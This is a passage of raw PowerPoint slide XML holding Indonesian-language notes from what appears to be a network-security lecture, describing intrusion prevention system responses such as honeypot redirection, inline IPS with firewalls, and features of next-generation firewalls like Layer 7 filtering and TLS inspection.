              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> honeypot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> honeynet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (API) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83742386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Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Generasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terpadu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproduksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>generasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>generasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NGFW) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2010 oleh Palo Alto. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh NGFW, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipikal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Layer 7, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Transport Layer Security (TLS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Integrasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IPS). Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>generasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
